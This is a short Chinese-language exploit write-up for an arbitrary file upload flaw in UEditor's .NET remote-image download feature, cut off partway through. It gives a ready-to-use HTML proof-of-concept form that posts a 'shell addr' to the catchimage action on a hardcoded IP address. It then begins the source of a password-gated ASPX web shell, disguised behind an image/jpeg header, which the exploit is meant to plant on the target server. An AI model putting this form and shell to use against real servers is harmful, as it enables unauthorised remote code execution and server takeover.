前言:
UEditor编辑器远程下载功能漏洞导致任意文件上传
复现:
1.自己构造一个html,因为不是上传漏洞所以enctype 不需要指定为multipart/form-data , 之前见到有poc指定了这个值。完整的poc如下
<form action="http://47.98.50.253:8001/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>
打开poc
本地服务器建一个1234.aspx 文件
内容:
<?php header('content-type: image/jpeg'); ?>
<%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%><%if (Request["pass"]!=null){ Session.Add("k", Gui